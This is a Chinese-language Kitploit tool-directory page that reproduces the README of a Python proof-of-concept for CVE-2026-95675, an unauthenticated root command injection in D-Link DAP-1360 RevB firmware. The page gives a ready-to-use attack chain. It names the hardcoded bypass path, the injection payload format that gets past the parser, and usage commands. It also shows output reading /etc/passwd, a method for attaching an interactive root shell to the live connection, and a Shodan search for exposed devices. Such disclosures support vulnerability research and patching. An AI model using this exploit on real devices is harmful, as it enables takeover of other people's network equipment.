Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-95675 — Python PoC,利用 CVE-2026-95675,这是 D-Link DAP-1360 RevB 固件中一个未认证的 root 命令注入漏洞,通过硬编码认证绕过和 formSystemCheck 处理程序实现。 | Kitploit
工具/GitHubGitHub/d6fault/cve-2026-95675
嵌入式系统安全物联网安全漏洞分析漏洞利用逆向工程Web应用程序漏洞利用硬件与物联网安全远程访问工具固件分析
GitHubd6fault/cve-2026-95675

CVE-2026-95675

Python PoC,利用 CVE-2026-95675,这是 D-Link DAP-1360 RevB 固件中一个未认证的 root 命令注入漏洞,通过硬编码认证绕过和 formSystemCheck 处理程序实现。

129小时53分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-95675 — D-Link DAP-1360 RevB

formSystemCheck 处理程序中存在未认证远程 root 命令执行漏洞(CWE-78 — 操作系统命令注入),可通过硬编码认证后门访问。已在 DAP-1360 RevB,固件 2.14B05 上验证。

根本原因

两个独立问题串联:

1. 硬编码认证绕过路径。 在 main(httpd @ 0x4064c8)中:

root@kitploit:~
strcasecmp(request_path, "dEfWzDLOgIn")   ; token @ 0x48046c
  ...
  sw 1, 8(sp_login_slot)                  ; mark this source-IP as logged in

GET /dEfWzDLOgIn 返回 404(它并非真实文件),但作为副作用,会将请求来源 IP 的会话槽标记为已认证——无需用户名、密码或验证码。

2. 操作系统命令注入。 formSystemCheck (POST /apply.cgi?formSystemCheck)使用以下代码构建 shell 命令:

root@kitploit:~
_system("ping %s -c 2 >/tmp/test_ping", cgi("ipv4_ping"))

ipv4_ping 未经净化即传入格式字符串;_system() 使用 vsprintf 写入固定栈缓冲区,并将其交给 system()。该处理程序自身不执行任何认证检查。

解析器注意事项

busybox POST-body 解析器会剥离 ;、|、反引号和换行符,但 && 会保留。payload 必须终止前缀 ping,然后用 && 链接,例如:

root@kitploit:~
127.0.0.1 -c 1 && <command> > /www/out.htm && x

用法

root@kitploit:~
python3 autopoc.py <target> [command]

python3 autopoc.py 192.168.0.50
python3 autopoc.py 192.168.0.50 "ls -la /"
参数描述
target目标主机/IP(默认协议 http://)
command(可选)要运行的 root 命令(默认:cat /etc/passwd);使用 &&,而非 ;/`

工作原理

  1. GET /dEfWzDLOgIn — 触发硬编码认证绕过(返回 404;副作用发生在服务端)。
  2. POST /apply.cgi?formSystemCheck,携带 ipv4_ping=127.0.0.1 -c 1 && <cmd> > /www/<OUT> && x — root 命令注入。
  3. GET /<OUT> — 获取命令输出(httpd 提供 .htm/.html,而非 .txt)。

输出

root@kitploit:~
[*] target   : 192.168.0.50
[*] command  : cat /etc/passwd
[*] GET /dEfWzDLOgIn -> 404 (login slot flagged)
[*] POST /apply.cgi?formSystemCheck -> 302
[+] output (RCE.htm):
------------------------------------------------------------
root:x:0:0:root:/:/dev/null
nobody:x:0:0:nobody:/:/dev/null
------------------------------------------------------------

备注 / 限制

  • 设备 busybox 没有 nc、wget、base64、chmod、id — 请使用 cat、echo、ls、cp 等。
  • 输出写入全局可写的 docroot,并通过 HTTP 获取(无需监听器)。
  • 如需交互式 shell,注入的进程会继承客户端套接字作为 fd 5;结合 httpd 延迟响应直到 _system() 返回,sh <&5 >&5 2>&5 可将 shell 附加到活动连接(在用户模式 QEMU 下不稳定;在真实硬件上更好)。
  • 不适用于 DAP-1360 RevC1 / 固件 3.00 或 "D-Link Russia" DIR/xDSL 版本 — 端点、docroot 和解析器不同。这些需要单独分析。

暴露面

Shodan("CAMEO-httpd",httpd 厂商横幅)显示该确切代码库在互联网上暴露的实例数量很少;该设备主要是 LAN 侧接入点。利用需要能够访问 Web 管理界面。

下载工具